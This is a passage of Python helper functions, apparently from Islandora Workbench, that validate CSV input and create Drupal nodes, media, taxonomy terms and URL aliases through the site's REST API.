def validate_language_code(langcode):
# Drupal's language codes.
codes = ['af', 'am', 'ar', 'ast', 'az', 'be', 'bg', 'bn', 'bo', 'bs',
'ca', 'cs', 'cy', 'da', 'de', 'dz', 'el', 'en', 'en-x-simple', 'eo',
'es', 'et', 'eu', 'fa', 'fi', 'fil', 'fo', 'fr', 'fy', 'ga', 'gd', 'gl',
'gsw-berne', 'gu', 'he', 'hi', 'hr', 'ht', 'hu', 'hy', 'id', 'is', 'it',
'ja', 'jv', 'ka', 'kk', 'km', 'kn', 'ko', 'ku', 'ky', 'lo', 'lt', 'lv',
'mg', 'mk', 'ml', 'mn', 'mr', 'ms', 'my', 'ne', 'nl', 'nb', 'nn', 'oc',
'pa', 'pl', 'pt-pt', 'pt-br', 'ro', 'ru', 'sco', 'se', 'si', 'sk', 'sl',
'sq', 'sr', 'sv', 'sw', 'ta', 'ta-lk', 'te', 'th', 'tr', 'tyv', 'ug',
'uk', 'ur', 'vi', 'xx-lolspeak', 'zh-hans', 'zh-hant']
if langcode in codes:
return True
else:
return False
def clean_csv_values(row):
"""Strip leading and trailing whitespace from row values. Could be used in the
future for other normalization tasks.
"""
for field in row:
if isinstance(row[field], str):
row[field] = row[field].strip()
return row
def truncate_csv_value(field_name, record_id, field_config, value):
"""Drupal will not accept field values that have a length that
exceeds the configured maximum length for that field. 'value'
here is a field subvalue.
"""
if isinstance(value, str) and 'max_length' in field_config:
max_length = field_config['max_length']
if max_length is not None and len(value) > int(max_length):
original_value = value
value = value[:max_length]
logging.warning(
'CSV field value "%s" in field "%s" (record ID %s) truncated at %s characters as required by the field\'s configuration.',
original_value,
field_name,
record_id,
max_length)
return value
def get_node_field_values(config, nid):
"""Get a node's field data so we can use it during PATCH updates,
which replace a field's values.
"""
node_url = config['host'] + '/node/' + nid + '?_format=json'
response = issue_request(config, 'GET', node_url)
node_fields = json.loads(response.text)
return node_fields
def get_target_ids(node_field_values):
"""Get the target IDs of all entities in a field.
"""
target_ids = []
for target in node_field_values:
target_ids.append(target['target_id'])
return target_ids
def split_typed_relation_string(config, typed_relation_string, target_type):
"""Fields of type 'typed_relation' are represented in the CSV file
using a structured string, specifically namespace:property:id,
e.g., 'relators:pht:5'. 'id' is either a term ID or a node ID. This
function takes one of those strings (optionally with a multivalue
subdelimiter) and returns a list of dictionaries in the form they
take in existing node values.
Also, these values can (but don't need to) have an optional namespace
in the term ID segment, which is the vocabulary ID string. These
typed relation strings look like 'relators:pht:person:Jordan, Mark'.
However, since we split the typed relation strings only on the first
two :, we don't need to worry about what's in the third segment.
"""
return_list = []
temp_list = typed_relation_string.split(config['subdelimiter'])
for item in temp_list:
item_list = item.split(':', 2)
if value_is_numeric(item_list[2]):
target_id = int(item_list[2])
else:
target_id = item_list[2]
item_dict = {
'target_id': target_id,
'rel_type': item_list[0] + ':' + item_list[1],
'target_type': target_type}
return_list.append(item_dict)
return return_list
def split_geolocation_string(config, geolocation_string):
"""Fields of type 'geolocation' are represented in the CSV file using a
structured string, specifically lat,lng, e.g. "49.16667, -123.93333"
or "+49.16667, -123.93333". This function takes one of those strings
(optionally with a multivalue subdelimiter) and returns a list of
dictionaries with 'lat' and 'lng' keys required by the 'geolocation'
field type.
"""
return_list = []
temp_list = geolocation_string.split(config['subdelimiter'])
for item in temp_list:
item_list = item.split(',')
# Remove any leading \ which might be in value if it comes from a spreadsheet.
item_dict = {'lat': item_list[0].lstrip('\\').strip(), 'lng': item_list[1].lstrip('\\').strip()}
return_list.append(item_dict)
return return_list
def split_link_string(config, link_string):
"""Fields of type 'link' are represented in the CSV file using a structured string,
specifically uri%%title, e.g. "https://www.lib.sfu.ca%%SFU Library Website".
This function takes one of those strings (optionally with a multivalue subdelimiter)
and returns a list of dictionaries with 'uri' and 'title' keys required by the
'link' field type.
"""
return_list = []
temp_list = link_string.split(config['subdelimiter'])
for item in temp_list:
item_list = item.split('%%')
item_dict = {'uri': item_list[0].strip(), 'title': item_list[1].strip()}
return_list.append(item_dict)
return return_list
def validate_media_use_tid(config):
"""Validate whether the term ID or URI provided in the config value for media_use_tid is
in the Islandora Media Use vocabulary.
"""
if value_is_numeric(config['media_use_tid']) is not True and config['media_use_tid'].startswith('http'):
media_use_tid = get_term_id_from_uri(config, config['media_use_tid'])
if media_use_tid is False:
message = 'URI "' + \
config['media_use_tid'] + '" provided in configuration option "media_use_tid" does not match any taxonomy terms.'
logging.error(message)
sys.exit('Error: ' + message)
else:
# Confirm the tid exists and is in the islandora_media_use vocabulary
term_endpoint = config['host'] + '/taxonomy/term/' \
+ str(config['media_use_tid']) + '?_format=json'
headers = {'Content-Type': 'application/json'}
response = issue_request(config, 'GET', term_endpoint, headers)
if response.status_code == 404:
message = 'Term ID "' + \
str(config['media_use_tid']) + '" used in the "media_use_tid" configuration option is not a term ID (term doesn\'t exist).'
logging.error(message)
sys.exit('Error: ' + message)
if response.status_code == 200:
response_body = json.loads(response.text)
if 'vid' in response_body:
if response_body['vid'][0]['target_id'] != 'islandora_media_use':
message = 'Term ID "' + \
str(config['media_use_tid']) + '" provided in configuration option "media_use_tid" is not in the Islandora Media Use vocabulary.'
logging.error(message)
sys.exit('Error: ' + message)
def preprocess_field_data(subdelimiter, field_value, path_to_script):
"""Executes a field preprocessor script and returns its output and exit status code. The script
is passed the field subdelimiter as defined in the config YAML and the field's value, and
prints a modified vesion of the value (result) back to this function.
"""
cmd = subprocess.Popen(
[path_to_script, subdelimiter, field_value], stdout=subprocess.PIPE)
result, stderrdata = cmd.communicate()
return result, cmd.returncode
def execute_bootstrap_script(path_to_script, path_to_config_file):
"""Executes a bootstrap script and returns its output and exit status code.
@todo: pass config into script.
"""
cmd = subprocess.Popen(
[path_to_script, path_to_config_file], stdout=subprocess.PIPE)
result, stderrdata = cmd.communicate()
return result, cmd.returncode
def create_media(config, filename, node_uri, node_csv_row):
"""node_csv_row is an OrderedDict, e.g.
OrderedDict([('file', 'IMG_5083.JPG'), ('id', '05'), ('title', 'Alcatraz Island').
"""
if config['nodes_only'] is True:
return
is_remote = False
filename = filename.strip()
if filename.startswith('http'):
file_path = download_remote_file(config, filename, node_csv_row)
filename = file_path.split("/")[-1]
is_remote = True
elif os.path.isabs(filename):
file_path = filename
else:
file_path = os.path.join(config['input_dir'], filename)
mimetype = mimetypes.guess_type(file_path)
media_type = set_media_type(filename, config)
if value_is_numeric(config['media_use_tid']):
media_use_tid = config['media_use_tid']
if not value_is_numeric(config['media_use_tid']) and config['media_use_tid'].startswith('http'):
media_use_tid = get_term_id_from_uri(config, config['media_use_tid'])
media_endpoint_path = '/media/' + media_type + '/' + str(media_use_tid)
media_endpoint = node_uri + media_endpoint_path
location = config['drupal_filesystem'] + os.path.basename(filename)
media_headers = {
'Content-Type': mimetype[0],
'Content-Location': location
}
binary_data = open(file_path, 'rb')
media_response = issue_request(config, 'PUT', media_endpoint, media_headers, '', binary_data)
if is_remote and config['delete_tmp_upload'] is True:
containing_folder = os.path.join(config['input_dir'], re.sub('[^A-Za-z0-9]+', '_', node_csv_row[config['id_field']]))
shutil.rmtree(containing_folder)
if media_response.status_code == 201:
if 'location' in media_response.headers:
# A 201 response provides a 'location' header, but a '204' response does not.
media_uri = media_response.headers['location']
logging.info(
"Media (%s) created at %s, linked to node %s.",
media_type,
media_uri,
node_uri)
media_id = media_uri.rsplit('/', 1)[-1]
patch_media_fields(config, media_id, media_type, node_csv_row)
if media_type == 'image':
patch_image_alt_text(config, media_id, node_csv_row)
elif media_response.status_code == 204:
logging.warning(
"Media created and linked to node %s, but its URI is not available since its creation returned an HTTP status code of %s",
node_uri,
media_response.status_code)
logging.warning(
"Media linked to node %s base fields not updated.",
node_uri)
else:
logging.error(
'Media not created, PUT request to "%s" returned an HTTP status code of "%s".',
media_endpoint,
media_response.status_code)
binary_data.close()
return media_response.status_code
def patch_media_fields(config, media_id, media_type, node_csv_row):
"""Patch the media entity with base fields from the parent node.
"""
media_json = {
'bundle': [
{'target_id': media_type}
]
}
for field_name, field_value in node_csv_row.items():
if field_name == 'created' and len(field_value) > 0:
media_json['created'] = [{'value': field_value}]
if field_name == 'uid' and len(field_value) > 0:
media_json['uid'] = [{'target_id': field_value}]
if len(media_json) > 1:
endpoint = config['host'] + '/media/' + media_id + '?_format=json'
headers = {'Content-Type': 'application/json'}
response = issue_request(config, 'PATCH', endpoint, headers, media_json)
if response.status_code == 200:
logging.info(
"Media %s fields updated to match parent node's.", config['host'] + '/media/' + media_id)
else:
logging.warning(
"Media %s fields not updated to match parent node's.", config['host'] + '/media/' + media_id)
def patch_image_alt_text(config, media_id, node_csv_row):
"""Patch the alt text value for an image media. Use the parent node's title
unless the CSV record contains an image_alt_text field with something in it.
"""
get_endpoint = config['host'] + '/media/' + media_id + '?_format=json'
get_headers = {'Content-Type': 'application/json'}
get_response = issue_request(config, 'GET', get_endpoint, get_headers)
get_response_body = json.loads(get_response.text)
field_media_image_target_id = get_response_body['field_media_image'][0]['target_id']
for field_name, field_value in node_csv_row.items():
if field_name == 'title':
# Strip out HTML markup to guard against CSRF in alt text.
alt_text = re.sub('<[^<]+?>', '', field_value)
if field_name == 'image_alt_text' and len(field_value) > 0:
alt_text = re.sub('<[^<]+?>', '', field_value)
media_json = {
'bundle': [
{'target_id': 'image'}
],
'field_media_image': [
{"target_id": field_media_image_target_id, "alt": alt_text}
],
}
patch_endpoint = config['host'] + '/media/' + media_id + '?_format=json'
patch_headers = {'Content-Type': 'application/json'}
patch_response = issue_request(
config,
'PATCH',
patch_endpoint,
patch_headers,
media_json)
if patch_response.status_code != 200:
logging.warning(
"Alt text for image media %s not updated.",
config['host'] + '/media/' + media_id)
def remove_media_and_file(config, media_id):
"""Delete a media and the file associated with it.
"""
# First get the media JSON.
get_media_url = '/media/' + str(media_id) + '?_format=json'
get_media_response = issue_request(config, 'GET', get_media_url)
get_media_response_body = json.loads(get_media_response.text)
# These are the Drupal field names on the various types of media.
file_fields = [
'field_media_file',
'field_media_image',
'field_media_document',
'field_media_audio_file',
'field_media_video_file']
for file_field_name in file_fields:
if file_field_name in get_media_response_body:
file_id = get_media_response_body[file_field_name][0]['target_id']
break
# Delete the file first.
file_endpoint = config['host'] + '/entity/file/' + str(file_id) + '?_format=json'
file_response = issue_request(config, 'DELETE', file_endpoint)
if file_response.status_code == 204:
logging.info("File %s (from media %s) deleted.", file_id, media_id)
else:
logging.error(
"File %s (from media %s) not deleted (HTTP response code %s).",
file_id,
media_id,
file_response.status_code)
# Then the media.
if file_response.status_code == 204:
media_endpoint = config['host'] + '/media/' + str(media_id) + '?_format=json'
media_response = issue_request(config, 'DELETE', media_endpoint)
if media_response.status_code == 204:
logging.info("Media %s deleted.", media_id)
return media_response.status_code
else:
logging.error(
"Media %s not deleted (HTTP response code %s).",
media_id,
media_response.status_code)
return False
return False
# @lru_cache(maxsize=None)
def get_csv_data(config):
"""Read the input CSV data and prepare it for use in create, update, etc. tasks.
This function reads the source CSV file (or the CSV dump from Google Sheets or Excel),
applies some prepocessing to each CSV record (specifically, it adds any CSV field
templates that are registered in the config file, and it filters out any CSV
records or lines in the CSV file that begine with a #), and finally, writes out
a version of the CSV data to a file that appends .prepocessed to the input
CSV file name. It is this .prepocessed file that is used in create, update, etc.
tasks.
"""
if os.path.isabs(config['input_csv']):
input_csv_path = config['input_csv']
elif config['input_csv'].startswith('http') is True:
input_csv_path = os.path.join(config['input_dir'], config['google_sheets_csv_filename'])
elif config['input_csv'].endswith('.xlsx') is True:
input_csv_path = os.path.join(config['input_dir'], config['excel_csv_filename'])
else:
input_csv_path = os.path.join(config['input_dir'], config['input_csv'])
if not os.path.exists(input_csv_path):
message = 'Error: CSV file ' + input_csv_path + ' not found.'
logging.error(message)
sys.exit(message)
try:
csv_reader_file_handle = open(input_csv_path, 'r', encoding="utf-8", newline='')
except (UnicodeDecodeError):
message = 'Error: CSV file ' + input_csv_path + ' must be encoded in ASCII or UTF-8.'
logging.error(message)
sys.exit(message)
csv_writer_file_handle = open(input_csv_path + '.prepocessed', 'w+', newline='')
csv_reader = csv.DictReader(csv_reader_file_handle, delimiter=config['delimiter'])
csv_reader_fieldnames = csv_reader.fieldnames
tasks = ['create', 'update']
if config['task'] in tasks and 'csv_field_templates' in config and len(config['csv_field_templates']) > 0:
# If the config file contains CSV field templates, append them to the CSV data.
# Make a copy of the column headers so we can skip adding templates to the new CSV
# if they're present in the source CSV. We don't want fields in the source CSV to be
# stomped on by templates.
csv_reader_fieldnames_orig = copy.copy(csv_reader_fieldnames)
for template in config['csv_field_templates']:
for field_name, field_value in template.items():
if field_name not in csv_reader_fieldnames_orig:
csv_reader_fieldnames.append(field_name)
csv_writer = csv.DictWriter(csv_writer_file_handle, fieldnames=csv_reader_fieldnames)
csv_writer.writeheader()
row_num = 0
unique_identifiers = []
for row in csv_reader:
row_num += 1
for template in config['csv_field_templates']:
for field_name, field_value in template.items():
if field_name not in csv_reader_fieldnames_orig:
row[field_name] = field_value
# Skip CSV records whose first column begin with #.
if not list(row.values())[0].startswith('#'):
try:
unique_identifiers.append(row[config['id_field']])
csv_writer.writerow(row)
except (ValueError):
message = "Error: Row " + str(row_num) + ' in your CSV file ' + \
"has more columns (" + str(len(row)) + ") than there are headers (" + \
str(len(csv_reader.fieldnames)) + ').'
logging.error(message)
sys.exit(message)
repeats = set(([x for x in unique_identifiers if unique_identifiers.count(x) > 1]))
if len(repeats) > 0:
message = "duplicated identifiers found: " + str(repeats)
logging.error(message)
sys.exit(message)
else:
csv_writer = csv.DictWriter(csv_writer_file_handle, fieldnames=csv_reader_fieldnames)
csv_writer.writeheader()
row_num = 0
for row in csv_reader:
row_num += 1
# Skip CSV records whose first column begin with #.
if not list(row.values())[0].startswith('#'):
try:
csv_writer.writerow(row)
except (ValueError):
message = "Error: Row " + str(row_num) + ' in your CSV file ' + \
"has more columns (" + str(len(row)) + ") than there are headers (" + \
str(len(csv_reader.fieldnames)) + ').'
logging.error(message)
sys.exit(message)
csv_writer_file_handle.close()
preprocessed_csv_reader_file_handle = open(input_csv_path + '.prepocessed', 'r')
preprocessed_csv_reader = csv.DictReader(preprocessed_csv_reader_file_handle, delimiter=config['delimiter'])
return preprocessed_csv_reader
def get_term_pairs(config, vocab_id):
"""Get all the term IDs plus associated term names in a vocabulary. If
the vocabulary does not exist, or is not registered with the view, the
request to Drupal returns a 200 plus an empty JSON list, i.e., [].
"""
term_dict = dict()
# Note: this URL requires the view "Terms in vocabulary", created by the
# Islandora Workbench Integation module, to present on the target
# Islandora.
vocab_url = config['host'] + '/vocabulary/' + vocab_id + '?_format=json'
response = issue_request(config, 'GET', vocab_url)
vocab = json.loads(response.text)
for term in vocab:
name = term['name'][0]['value']
tid = term['tid'][0]['value']
term_dict[tid] = name
return term_dict
def find_term_in_vocab(config, vocab_id, term_name_to_find):
"""For a given term name, loops through all term names in vocab_id
to see if term is there already. If so, returns term ID; if not
returns False.
"""
terms_in_vocab = get_term_pairs(config, vocab_id)
for tid, term_name in terms_in_vocab.items():
match = compare_strings(term_name, term_name_to_find)
if match:
return tid
# None matched.
return False
def get_term_id_from_uri(config, uri):
"""For a given URI, query the Term from URI View created by the Islandora
Workbench Integration module. Because we don't know which field each
taxonomy uses to store URIs (it's either field_external_uri or field_authority_link),
we need to check both options in the "Term from URI" View.
"""
# Some vocabuluaries use this View.
terms_with_uri = []
term_from_uri_url = config['host'] \
+ '/term_from_uri?_format=json&uri=' + uri.replace('#', '%23')
term_from_uri_response = issue_request(config, 'GET', term_from_uri_url)
if term_from_uri_response.status_code == 200:
term_from_uri_response_body_json = term_from_uri_response.text
term_from_uri_response_body = json.loads(
term_from_uri_response_body_json)
if len(term_from_uri_response_body) == 1:
tid = term_from_uri_response_body[0]['tid'][0]['value']
return tid
if len(term_from_uri_response_body) > 1:
for term in term_from_uri_response_body:
terms_with_uri.append(
{term['tid'][0]['value']: term['vid'][0]['target_id']})
tid = term_from_uri_response_body[0]['tid'][0]['value']
print("Warning: See log for important message about use of term URIs.")
logging.warning(
'Term URI "%s" is used for more than one term (with these term ID/vocabulary ID combinations: ' +
str(terms_with_uri) +
'). Workbench is choosing the first term ID (%s)).',
uri,
tid)
return tid
# And some vocabuluaries use this View.
term_from_authority_link_url = config['host'] + \
'/term_from_authority_link?_format=json&authority_link=' + uri.replace('#', '%23')
term_from_authority_link_response = issue_request(
config, 'GET', term_from_authority_link_url)
if term_from_authority_link_response.status_code == 200:
term_from_authority_link_response_body_json = term_from_authority_link_response.text
term_from_authority_link_response_body = json.loads(
term_from_authority_link_response_body_json)
if len(term_from_authority_link_response_body) == 1:
tid = term_from_authority_link_response_body[0]['tid'][0]['value']
return tid
elif len(term_from_authority_link_response_body) > 1:
for term in term_from_authority_link_response_body:
terms_with_uri.append(
{term['tid'][0]['value']: term['vid'][0]['target_id']})
tid = term_from_authority_link_response_body[0]['tid'][0]['value']
print("Warning: See log for important message about use of term URIs.")
logging.warning(
'Term URI "%s" is used for more than one term (with these term ID/vocabulary ID combinations: ' +
str(terms_with_uri) +
'). Workbench is choosing the first term ID (%s)).',
uri,
tid)
return tid
else:
# URI does not match any term.
return False
# Non-200 response code.
return False
def create_term(config, vocab_id, term_name):
"""Adds a term to the target vocabulary. Returns the new term's ID
if successful (if the term already exists) or False if not.
"""
# Check to see if term exists; if so, return its ID, if not, proceed to
# create it.
tid = find_term_in_vocab(config, vocab_id, term_name)
if value_is_numeric(tid):
logging.info(
'Term "%s" (term ID %s) already exists in vocabulary "%s".',
term_name,
tid,
vocab_id)
return tid
if config['allow_adding_terms'] is False:
logging.warning(
'To create new taxonomy terms, you must add "allow_adding_terms: true" to your configuration file.')
return False
if len(term_name) > 255:
truncated_term_name = term_name[:255]
message = 'Term "' + term_name + '"' + \
"provided in the CSV data exceeds Drupal's maximum length of 255 characters."
message_2 = ' It has been trucated to "' + truncated_term_name + '".'
logging.info(message + message_2)
term_name = truncated_term_name
term = {
"vid": [
{
"target_id": vocab_id,
"target_type": "taxonomy_vocabulary"
}
],
"status": [
{
"value": True
}
],
"name": [
{
"value": term_name
}
],
"description": [
{
"value": "",
"format": None
}
],
"weight": [
{
"value": 0
}
],
"parent": [
{
"target_id": None
}
],
"default_langcode": [
{
"value": True
}
],
"path": [
{
"alias": None,
"pid": None,
"langcode": "en"
}
]
}
term_endpoint = config['host'] + '/taxonomy/term?_format=json'
headers = {'Content-Type': 'application/json'}
response = issue_request(
config,
'POST',
term_endpoint,
headers,
term,
None)
if response.status_code == 201:
term_response_body = json.loads(response.text)
tid = term_response_body['tid'][0]['value']
logging.info(
'Term %s ("%s") added to vocabulary "%s".',
tid,
term_name,
vocab_id)
return tid
else:
logging.warning(
"Term '%s' not created, HTTP response code was %s.",
term_name,
response.status_code)
return False
def create_url_alias(config, node_id, url_alias):
json = {'path': [
{'value': '/node/' + str(node_id)}
],
'alias': [
{'value': url_alias}
]
}
headers = {'Content-Type': 'application/json'}
response = issue_request(
config,
'POST',
config['host'] +
'/entity/path_alias?_format=json',
headers,
json,
None)
if response.status_code != 201:
logging.error(
"URL alias '%s' not created for node %s, HTTP response code was %s (it might already exist).",
url_alias,
config['host'] +
'/node/' +
node_id,
response.status_code)
def prepare_term_id(config, vocab_ids, term):
"""REST POST and PATCH operations require taxonomy term IDs, not term names. This
funtion checks its 'term' argument to see if it's numeric (i.e., a term ID) and
if it is, returns it as is. If it's not (i.e., a term name) it looks for the
term name in the referenced vocabulary and returns its term ID (existing or
newly created).
"""
term = str(term)
term = term.strip()
if value_is_numeric(term):
return term
# Special case: if the term starts with 'http', assume it's a Linked Data URI
# and get its term ID from the URI.
elif term.startswith('http'):
# Note: get_term_from_uri() will return False if the URI doesn't match
# a term.
tid_from_uri = get_term_id_from_uri(config, term)
if value_is_numeric(tid_from_uri):
return tid_from_uri
else:
if len(vocab_ids) == 1:
tid = create_term(config, vocab_ids[0].strip(), term.strip())
return tid
else:
# Term names used in mult-taxonomy fields. They need to be namespaced with
# the taxonomy ID.
#
# If the field has more than one vocabulary linked to it, we don't know which
# vocabulary the user wants a new term to be added to, and if the term name is
# already used in any of the taxonomies linked to this field, we also don't know
# which vocabulary to look for it in to get its term ID. Therefore, we always need
# to namespace term names if they are used in multi-taxonomy fields. If people want
# to use term names that contain a colon, they need to add them to Drupal first
# and use the term ID. Workaround PRs welcome.
#
# Split the namespace/vocab ID from the term name on ':'.
namespaced = re.search(':', term)
if namespaced:
[vocab_id, term_name] = term.split(':')
tid = create_term(config, vocab_id.strip(), term_name.strip())
return tid
def get_field_vocabularies(config, field_definitions, field_name):
"""Gets IDs of vocabularies linked from the current field (could be more than one).
"""
if 'vocabularies' in field_definitions[field_name]:
vocabularies = field_definitions[field_name]['vocabularies']
return vocabularies
else:
return False
def value_is_numeric(value):
"""Tests to see if value is numeric.
"""
var = str(value)
var = var.strip()
if var.isnumeric():
return True
else:
return False
def compare_strings(known, unknown):
"""Normalizes the unknown string and the known one, and compares
them. If they match, returns True, if not, False. We could
use FuzzyWuzzy or something but this is probably sufficient.
"""
# Strips leading and trailing whitespace.
known = known.strip()
unknown = unknown.strip()
# Converts to lower case.
known = known.lower()
unknown = unknown.lower()
# Remove all punctuation.
for p in string.punctuation:
known = known.replace(p, ' ')
unknown = unknown.replace(p, ' ')
# Replaces whitespace with a single space.
known = " ".join(known.split())
unknown = " ".join(unknown.split())
if unknown == known:
return True
else:
return False
def get_csv_record_hash(row):
"""Concatenate values in the CSV record and get an MD5 hash on the
resulting string.
"""
serialized_row = ''
for field in row:
if isinstance(row[field], str) or isinstance(row[field], int):
if isinstance(row[field], int):
row[field] = str(row[field])
row_value = row[field].strip()
row_value = " ".join(row_value.split())
serialized_row = serialized_row + row_value + " "
serialized_row = bytes(serialized_row.strip().lower(), 'utf-8')
hash_object = hashlib.md5(serialized_row)
return hash_object.hexdigest()
def validate_csv_field_cardinality(config, field_definitions, csv_data):
"""Compare values in the CSV data with the fields' cardinality. Log CSV
fields that have more values than allowed, and warn user if
these fields exist in their CSV data.
"""
field_cardinalities = dict()
csv_headers = csv_data.fieldnames
for csv_header in csv_headers:
if csv_header in field_definitions.keys():
cardinality = field_definitions[csv_header]['cardinality']
# We don't care about cardinality of -1 (unlimited).
if int(cardinality) > 0:
field_cardinalities[csv_header] = cardinality
for count, row in enumerate(csv_data, start=1):
for field_name in field_cardinalities.keys():
if field_name in row:
# Don't check for the subdelimiter in title.
if field_name == 'title':
continue
delimited_field_values = row[field_name].split(config['subdelimiter'])
if field_cardinalities[field_name] == 1 and len(delimited_field_values) > 1:
if config['task'] == 'create':
message = 'CSV field "' + field_name + '" in (!) record with ID ' + \
row[config['id_field']] + ' contains more values than the number '
if config['task'] == 'update':
message = 'CSV field "' + field_name + '" in record with node ID ' \
+ row['node_id'] + ' contains more values than the number '
message_2 = 'allowed for that field (' + str(
field_cardinalities[field_name]) + '). Workbench will add only the first value.'
print('Warning: ' + message + message_2)
logging.warning(message + message_2)
if int(field_cardinalities[field_name]) > 1 and len(delimited_field_values) > field_cardinalities[field_name]:
if config['task'] == 'create':
message = 'CSV field "' + field_name + '" in (!) record with ID ' + \
row[config['id_field']] + ' contains more values than the number '
if config['task'] == 'update':
message = 'CSV field "' + field_name + '" in record with node ID ' \
+ row['node_id'] + ' contains more values than the number '
message_2 = 'allowed for that field (' + str(
field_cardinalities[field_name]) + '). Workbench will add only the first ' + str(
field_cardinalities[field_name]) + ' values.'
print('Warning: ' + message + message_2)
logging.warning(message + message_2)
def validate_csv_field_length(config, field_definitions, csv_data):
"""Compare values in the CSV data with the fields' max_length. Log CSV
fields that exceed their max_length, and warn user if
these fields exist in their CSV data.
"""
field_max_lengths = dict()
csv_headers = csv_data.fieldnames
for csv_header in csv_headers:
if csv_header in field_definitions.keys():
if 'max_length' in field_definitions[csv_header]:
max_length = field_definitions[csv_header]['max_length']
# We don't care about max_length of None (i.e., it's
# not applicable or unlimited).
if max_length is not None:
field_max_lengths[csv_header] = max_length
for count, row in enumerate(csv_data, start=1):
for field_name in field_max_lengths.keys():
if field_name in row:
delimited_field_values = row[field_name].split(
config['subdelimiter'])
for field_value in delimited_field_values:
field_value_length = len(field_value)
if field_name in field_max_lengths and len(field_value) > int(field_max_lengths[field_name]):
if config['task'] == 'create':
message = 'CSV field "' + field_name + '" in record with ID ' + \
row[config['id_field']] + ' contains a value that is longer (' + str(len(field_value)) + ' characters)'
if config['task'] == 'update':
message = 'CSV field "' + field_name + '" in record with node ID ' + \
row['node_id'] + ' contains a value that is longer (' + str(len(field_value)) + ' characters)'
message_2 = ' than allowed for that field (' + str(
field_max_lengths[field_name]) + ' characters). Workbench will truncate this value prior to populating Drupal.'
print('Warning: ' + message + message_2)
logging.warning(message + message_2)
def validate_geolocation_fields(config, field_definitions, csv_data):
"""Validate lat,long values in fields that are of type 'geolocation'.
"""
geolocation_fields_present = False
for count, row in enumerate(csv_data, start=1):
for field_name in field_definitions.keys():
if field_definitions[field_name]['field_type'] == 'geolocation':
if field_name in row:
geolocation_fields_present = True
delimited_field_values = row[field_name].split(config['subdelimiter'])
for field_value in delimited_field_values:
if len(field_value.strip()):
if not validate_latlong_value(field_value.strip()):
message = 'Value in field "' + field_name + '" in row ' + str(count) + \
' (' + field_value + ') is not a valid lat,long pair.'
logging.error(message)
sys.exit('Error: ' + message)
if geolocation_fields_present is True:
message = "OK, geolocation field values in the CSV file validate."
print(message)
logging.info(message)
def validate_latlong_value(latlong):
# Remove leading \ that may be present if input CSV is from a spreadsheet.
latlong = latlong.lstrip('\\')
if re.match(r"^[-+]?([1-8]?\d(\.\d+)?|90(\.0+)?),\s*[-+]?(180(\.0+)?|((1[0-7]\d)|([1-9]?\d))(\.\d+)?)$", latlong):
return True
else:
return False
def validate_term_name_length(term_name, row_number, column_name):
"""Checks that the length of a term name does not exceed
Drupal's 255 character length.
"""
term_name = term_name.strip()
if len(term_name) > 255:
message = 'CSV field "' + column_name + '" in record ' + row_number + \
" contains a taxonomy term that exceeds Drupal's limit of 255 characters (length of term is " + str(len(term_name)) + ' characters).'
message_2 = ' Term provided in CSV is "' + term_name + '".'
message_3 = " Please reduce the term's length to less than 256 characters."
logging.error(message + message_2 + message_3)
sys.exit(
'Error: ' +
message +
' See the Workbench log for more information.')
def validate_node_created_date(csv_data):
"""Checks that date_string is in the format used by Drupal's 'created' node property,
e.g., 2020-11-15T23:49:22+00:00. Also check to see if the date is in the future.
"""
for count, row in enumerate(csv_data, start=1):
for field_name, field_value in row.items():
if field_name == 'created' and len(field_value) > 0:
# matches = re.match(r'^\d{4}-\d\d-\d\dT\d\d:\d\d:\d\d[+-]\d\d:\d\d$', field_value)
if not validate_node_created_date_string(field_value):
message = 'CSV field "created" in record ' + \
str(count) + ' contains a date "' + field_value + '" that is not formatted properly.'
logging.error(message)
sys.exit('Error: ' + message)
now = datetime.datetime.now()
# Remove the GMT differential at the end of the time string.
date_string_trimmed = re.sub(
r'[+-]\d\d:\d\d$', '', field_value)
created_date = datetime.datetime.strptime(
date_string_trimmed, '%Y-%m-%dT%H:%M:%S')
if created_date > now:
message = 'CSV field "created" in record ' + \
str(count) + ' contains a date "' + field_value + '" that is in the future.'
logging.error(message)
sys.exit('Error: ' + message)
message = 'OK, dates in the "created" CSV field are all formated correctly and in the future.'
print(message)
logging.info(message)
def validate_node_created_date_string(created_date_string):
if re.match(r"^\d{4}-\d\d-\d\dT\d\d:\d\d:\d\d[+-]\d\d:\d\d$", created_date_string):
return True
else:
return False
def validate_edtf_fields(config, field_definitions, csv_data):
"""Validate values in fields that are of type 'edtf'.
"""
edtf_fields_present = False
for count, row in enumerate(csv_data, start=1):
for field_name in field_definitions.keys():
if field_definitions[field_name]['field_type'] == 'edtf':
if field_name in row:
edtf_fields_present = True
delimited_field_values = row[field_name].split(config['subdelimiter'])
for field_value in delimited_field_values:
if len(field_value.strip()):
result, validation_message = validate_edtf_value(field_value)
if result is False:
message = 'Value in field "' + field_name + '" in row ' + str(count) + \
' ("' + field_value + '") is not a valid EDTF date/time.' + ' ' + validation_message
logging.error(message)
sys.exit('Error: ' + message)
if edtf_fields_present is True:
message = "OK, ETDF field values in the CSV file validate."
print(message)
logging.info(message)
def validate_edtf_value(edtf):
edtf = edtf.strip()
# Value contains an EDTF interval, e.g. ‘1964/2008’
if '/' in edtf:
interval_dates = edtf.split('/', 1)
for interval_date in interval_dates:
result, message = validate_single_edtf_date(interval_date)
if result is False:
return False, 'Interval date "' + interval_date + '"" does not validate.' + ' ' + message
# If we've made it this far, return True.
return True, None
# Value is an EDTF set if it contains a , or .., so it must start with a [ and ends with a ].
elif edtf.count('.') == 2 or ',' in edtf:
if not (edtf.startswith('[') and edtf.endswith(']')):
return False, 'Date set "' + edtf + '" does not contain a leading [ and/or trailing ].'
# Value contains an EDTF set, e.g. '[1667,1668,1670..1672]'.
if '[' in edtf:
edtf = edtf.lstrip('[')
edtf = edtf.rstrip(']')
if '..' in edtf or ',' in edtf:
# .. is at beginning of set, e.g. ..1760-12-03
if edtf.startswith('..'):
edtf = edtf.lstrip('..')
result, message = validate_single_edtf_date(edtf)
if result is False:
return False, 'Set date "' + edtf + '"" does not validate.' + ' ' + message
else:
return True, None
if edtf.endswith('..'):
edtf = edtf.rstrip('..')
result, message = validate_single_edtf_date(edtf)
if result is False:
return False, 'Set date "' + edtf + '"" does not validate.' + ' ' + message
else:
return True, None
set_date_boundaries = re.split(r'\.\.|,', edtf)
for set_date_boundary in set_date_boundaries:
result, message = validate_single_edtf_date(set_date_boundary)
if result is False:
return False, 'Set date "' + set_date_boundary + '"" does not validate.' + ' ' + message
# If we've made it this far, return True.
return True, None
# Assume value is just a single EDTF date.
else:
result, message = validate_single_edtf_date(edtf)
if result is False:
return False, 'EDTF date "' + edtf + '"" does not validate.' + ' ' + message
